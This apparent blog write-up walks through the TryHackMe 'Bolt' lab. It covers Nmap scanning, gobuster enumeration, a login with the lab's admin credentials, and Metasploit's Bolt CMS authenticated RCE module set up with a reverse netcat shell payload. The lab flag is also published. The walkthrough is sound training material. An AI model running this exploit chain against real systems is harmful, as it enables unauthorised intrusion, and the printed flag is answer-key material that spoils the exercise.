Introduction
Practical labs are one of the best ways to learn ethical hacking and penetration testing. In this report, I will explain my walkthrough of the Bolt room on TryHackMe.

The main goal of this lab is to identify vulnerabilities in a web application and gain access to the target machine.

During this lab, I practiced several penetration testing techniques, including:

Network scanning
Web enumeration
Identifying a vulnerable CMS
Exploiting the system using Metasploit Framework
Lab Setup
Before starting the lab, I connected to the TryHackMe VPN and deployed the target machine.

Tools used in this lab include:

Nmap
Gobuster
Web Browser
Metasploit
These tools help identify services, find hidden directories, and exploit vulnerabilities.

Step 1: Scanning the Target
The first step in penetration testing is identifying open ports and running services.

I used Nmap to scan the target machine.

Example command:

nmap -sC -A -Pn <target-ip>
 nmap -sC -A -Pn 10.48.188.31
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-12 13:16 +0530
Nmap scan report for 10.48.188.31
Host is up (0.049s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f3:85:ec:54:f2:01:b1:94:40:de:42:e8:21:97:20:80 (RSA)
|   256 77:c7:c1:ae:31:41:21:e4:93:0e:9a:dd:0b:29:e1:ff (ECDSA)
|_  256 07:05:43:46:9d:b2:3e:f0:4d:69:67:e4:91:d3:d3:7f (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
8000/tcp open  http    (PHP 7.2.32-1)
|_http-generator: Bolt
|_http-title: Bolt | A hero is unleashed
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 Not Found
|     Date: Thu, 12 Mar 2026 07:46:26 GMT
|     Connection: close
|     X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
|     Cache-Control: private, must-revalidate
|     Date: Thu, 12 Mar 2026 07:46:26 GMT
|     Content-Type: text/html; charset=UTF-8
|     pragma: no-cache
|     expires: -1
|     X-Debug-Token: c9adcd
|     <!doctype html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Bolt | A hero is unleashed</title>
|     <link href="https://fonts.googleapis.com/css?family=Bitter|Roboto:400,400i,700" rel="stylesheet">
|     <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
|     <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
|     <meta name="generator" content="Bolt">
|     </head>
|     <body>
|     href="#main-content" class="vis
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Date: Thu, 12 Mar 2026 07:46:26 GMT
|     Connection: close
|     X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
|     Cache-Control: public, s-maxage=600
|     Date: Thu, 12 Mar 2026 07:46:26 GMT
|     Content-Type: text/html; charset=UTF-8
|     X-Debug-Token: 899eff
|     <!doctype html>
|     <html lang="en-GB">
|     <head>
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Bolt | A hero is unleashed</title>
|     <link href="https://fonts.googleapis.com/css?family=Bitter|Roboto:400,400i,700" rel="stylesheet">
|     <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
|     <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
|     <meta name="generator" content="Bolt">
|     <link rel="canonical" href="http://0.0.0.0:8000/">
|     </head>
|_    <body class="front">
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8000-TCP:V=7.98%I=7%D=3/12%Time=69B26F4F%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,29E1,"HTTP/1\.0\x20200\x20OK\r\nDate:\x20Thu,\x2012\x20Mar\x20
SF:2026\x2007:46:26\x20GMT\r\nConnection:\x20close\r\nX-Powered-By:\x20PHP
SF:/7\.2\.32-1\+ubuntu18\.04\.1\+deb\.sury\.org\+1\r\nCache-Control:\x20pu
SF:blic,\x20s-maxage=600\r\nDate:\x20Thu,\x2012\x20Mar\x202026\x2007:46:26
SF:\x20GMT\r\nContent-Type:\x20text/html;\x20charset=UTF-8\r\nX-Debug-Toke
SF:n:\x20899eff\r\n\r\n<!doctype\x20html>\n<html\x20lang=\"en-GB\">\n\x20\
SF:x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20charset=\"u
SF:tf-8\">\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20name=\"viewport\"\x20
SF:content=\"width=device-width,\x20initial-scale=1\.0\">\n\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<title>Bolt\x20\|\x20A
SF:\x20hero\x20is\x20unleashed</title>\n\x20\x20\x20\x20\x20\x20\x20\x20<l
SF:ink\x20href=\"https://fonts\.googleapis\.com/css\?family=Bitter\|Roboto
SF::400,400i,700\"\x20rel=\"stylesheet\">\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0<link\x20rel=\"stylesheet\"\x20href=\"/theme/base-2018/css/bulma\.css\
SF:?8ca0842ebb\">\n\x20\x20\x20\x20\x20\x20\x20\x20<link\x20rel=\"styleshe
SF:et\"\x20href=\"/theme/base-2018/css/theme\.css\?6cb66bfe9f\">\n\x20\x20
SF:\x20\x20\t<meta\x20name=\"generator\"\x20content=\"Bolt\">\n\x20\x20\x2
SF:0\x20\t<link\x20rel=\"canonical\"\x20href=\"http://0\.0\.0\.0:8000/\">\
SF:n\x20\x20\x20\x20</head>\n\x20\x20\x20\x20<body\x20class=\"front\">\n\x
SF:20\x20\x20\x20\x20\x20\x20\x20<a\x20")%r(FourOhFourRequest,14A7,"HTTP/1
SF:\.0\x20404\x20Not\x20Found\r\nDate:\x20Thu,\x2012\x20Mar\x202026\x2007:
SF:46:26\x20GMT\r\nConnection:\x20close\r\nX-Powered-By:\x20PHP/7\.2\.32-1
SF:\+ubuntu18\.04\.1\+deb\.sury\.org\+1\r\nCache-Control:\x20private,\x20m
SF:ust-revalidate\r\nDate:\x20Thu,\x2012\x20Mar\x202026\x2007:46:26\x20GMT
SF:\r\nContent-Type:\x20text/html;\x20charset=UTF-8\r\npragma:\x20no-cache
SF:\r\nexpires:\x20-1\r\nX-Debug-Token:\x20c9adcd\r\n\r\n<!doctype\x20html
SF:>\n<html\x20lang=\"en\">\n\x20\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\
SF:x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0<meta\x20name=\"viewport\"\x20content=\"width=device-width,\x20initial
SF:-scale=1\.0\">\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20<title>Bolt\x20\|\x20A\x20hero\x20is\x20unleashed</title>\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20<link\x20href=\"https://fonts\.googleapis\
SF:.com/css\?family=Bitter\|Roboto:400,400i,700\"\x20rel=\"stylesheet\">\n
SF:\x20\x20\x20\x20\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/
SF:theme/base-2018/css/bulma\.css\?8ca0842ebb\">\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/theme/base-2018/css/them
SF:e\.css\?6cb66bfe9f\">\n\x20\x20\x20\x20\t<meta\x20name=\"generator\"\x2
SF:0content=\"Bolt\">\n\x20\x20\x20\x20</head>\n\x20\x20\x20\x20<body>\n\x
SF:20\x20\x20\x20\x20\x20\x20\x20<a\x20href=\"#main-content\"\x20class=\"v
SF:is");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.98%E=4%D=3/12%OT=22%CT=1%CU=41069%PV=Y%DS=3%DC=T%G=Y%TM=69B26F6
OS:E%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)SEQ
OS:(SP=104%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=C)SEQ(SP=105%GCD=1%ISR=109%TI=Z%
OS:CI=Z%II=I%TS=A)SEQ(SP=108%GCD=1%ISR=10A%TI=Z%CI=Z%TS=A)SEQ(SP=108%GCD=1%
OS:ISR=10A%TI=Z%CI=Z%II=I%TS=C)OPS(O1=M4E8ST11NW7%O2=M4E8ST11NW7%O3=M4E8NNT
OS:11NW7%O4=M4E8ST11NW7%O5=M4E8ST11NW7%O6=M4E8ST11)WIN(W1=F4B3%W2=F4B3%W3=F
OS:4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F507%O=M4E8NNSNW7%CC=Y%Q
OS:=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%
OS:W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=
OS:)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=
OS:S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RU
OS:CK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 3 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 110/tcp)
HOP RTT      ADDRESS
1   49.12 ms 192.168.128.1
2   ...
3   49.01 ms 10.48.188.31

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.05 seconds
The scan results showed:
Port 80(HTTP) open
Port 8000 (HTTP) open
Since port 80 is open, the target machine is running a web server.

Step 2: Exploring the Website
Next, I opened the target IP address in a web browser.

The website revealed that it was running Bolt CMS, a lightweight content management system used for building websites.

Identifying the CMS is important because attackers often search for known vulnerabilities associated with specific software.

I got username and password bolt:boltadmin123

Step 3: Directory Enumeration
To discover hidden directories and files, I used Gobuster.

Example command:

gobuster dir -u http://<target-ip> -w /usr/share/wordlists/dirb/common.txt
This scan helped find several directories, including:

/bolt
This directory led to the Bolt CMS login panel.

Step 4: Accessing the Admin Panel
The /bolt directory revealed the Bolt CMS admin login page.

Many systems use weak or default credentials, so I attempted common username and password combinations.

After testing several credentials, I successfully logged in to the admin dashboard.

Once inside the CMS dashboard, I gained access to various administrative features such as:

File editing
Content management
Plugin management
These features can sometimes be abused to execute malicious code.

Step 5: Exploiting Using Metasploit
To automate exploitation, I used the Metasploit Framework.

CMS
Bolt CMS 3.7.0 — Authenticated Remote Code Execution

Start Metasploit
msfconsole
 msfconsole   
Metasploit tip: To save all commands executed since start up to a file, use the 
makerc command

                                   .,,.                  .                                                                                                                                                                                  
                                .\$$$$$L..,,==aaccaacc%#s$b.       d8,    d8P                                                                                                                                                               
                     d8P        #$$$$$$$$$$$$$$$$$$$$$$$$$$$b.    `BP  d888888p                                                                                                                                                             
                  d888888P      '7$$$$\""""''^^`` .7$$$|D*"'```         ?88'                                                                                                                                                                
  d8bd8b.d8p d8888b ?88' d888b8b            _.os#$|8*"`   d8P       ?8b  88P                                                                                                                                                                
  88P`?P'?P d8b_,dP 88P d8P' ?88       .oaS###S*"`       d8P d8888b $whi?88b 88b                                                                                                                                                            
 d88  d8 ?8 88b     88b 88b  ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b                                                                                                                                                               
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"`    `?88'  ?88 ?88 88b  d88 d88                                                                                                                                                                    
                          .a#$$$$$$"`          88b  d8P  88b`?8888P'                                                                                                                                                                        
                       ,s$$$$$$$"`             888888P'   88n      _.,,,ass;:                                                                                                                                                               
                    .a$$$$$$$P`               d88P'    .,.ass%#S$$$$$$$$$$$$$$'                                                                                                                                                             
                 .a$###$$$P`           _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'                                                                                                                                                              
              ,a$$###$$P`  _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'                                                                                                                                                               
           .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'                                                                                                                                                                
_______________________________________________________________   ,&$$$$$$'_____                                                                                                                                                            
                                                                 ll&&$$$$'                                                                                                                                                                  
                                                              .;;lll&&&&'                                                                                                                                                                   
                                                            ...;;lllll&'                                                                                                                                                                    
                                                          ......;;;llll;;;....                                                                                                                                                              
                                                           ` ......;;;;... .  .

       =[ metasploit v6.4.112-dev                               ]
+ -- --=[ 2,607 exploits - 1,325 auxiliary - 1,710 payloads     ]
+ -- --=[ 430 post - 49 encoders - 14 nops - 9 evasion          ]

Metasploit Documentation: https://docs.metasploit.com/
The Metasploit Framework is a Rapid7 Open Source Project

msf >
This launches the Metasploit environment.

Search for Bolt Exploits
Next, search for available exploits related to Bolt CMS.

msf > search bolt

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/unix/webapp/bolt_authenticated_rce  2020-05-07       great      Yes    Bolt CMS 3.7.0 - Authenticated Remote Code Execution
   1    \_ target: Linux (x86)                    .                .          .      .
   2    \_ target: Linux (x64)                    .                .          .      .
   3    \_ target: Linux (cmd)                    .                .          .      .
   4  exploit/multi/http/bolt_file_upload         2015-08-17       excellent  Yes    CMS Bolt File Upload Vulnerability


Interact with a module by name or index. For example info 4, use 4 or use exploit/multi/http/bolt_file_upload

Metasploit will display available modules related to Bolt vulnerabilities.

Become a Medium member
Example

Select the Exploit
exploit/unix/webapp/bolt_authenticated_rce
use 0
Configure the Exploit
Check required parameters:

show options
msf exploit(unix/webapp/bolt_authenticated_rce) > options

Module options (exploit/unix/webapp/bolt_authenticated_rce):

   Name                 Current Setting        Required  Description
   ----                 ---------------        --------  -----------
   FILE_TRAVERSAL_PATH  ../../../public/files  yes       Traversal path from "/files" on the web server to "/root" on the server
   PASSWORD                                    yes       Password to authenticate with
   Proxies                                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
   RHOSTS                                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                8000                   yes       The target port (TCP)
   SSL                  false                  no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI            /                      yes       Base path to Bolt CMS
   URIPATH                                     no        The URI to use for this exploit (default is random)
   USERNAME                                    yes       Username to authenticate with
   VHOST                                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   Linux (cmd)



View the full module info with the info, or info -d command.
Set the target IP:

set RHOSTS <target-ip>
Set the local IP for the reverse connection:

set LHOST <your-ip>
Choose a set USERNAME AND PASSWORD

set USERNAME
set password
Run the Exploit
Execute the exploit:

run
If the attack is successful, Metasploit will establish a reverse shell connection from the target machine.

Step 6: Gaining Shell Access
Once the exploit succeeded, I gained shell access to the target system.

Example commands:

whoami
This shows the current user.

pwd
Displays the current working directory.

From here, I explored the system to locate important files and flags.

Step 7: Post Exploitation
After gaining access, I searched the system for sensitive files.

Common locations to check include:

/home
/var/www
/root
These directories may contain flags or configuration files.

Through exploration, I was able to complete the objectives of the lab.

Flag= THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}

Lessons Learned
This lab taught several important cybersecurity concepts:

1. Enumeration is Critical
Proper scanning and enumeration reveal the attack surface of a system.

2. Web Applications Are Common Targets
Many real-world attacks happen through vulnerable web applications.

3. CMS Platforms Must Be Secured
Outdated or poorly configured CMS systems can easily be exploited.

4. Automation Tools Help
Tools like Metasploit Framework simplify exploitation but understanding the underlying vulnerabilities is essential.

Conclusion
The Bolt room on TryHackMe provides an excellent introduction to web application exploitation.

By completing this lab, I practiced:

Network scanning
Web enumeration
CMS exploitation
Using Metasploit for remote access
This lab is highly recommended for beginners who want to learn the fundamentals of penetration testing.

Practicing labs like this helps build real-world cybersecurity skills.
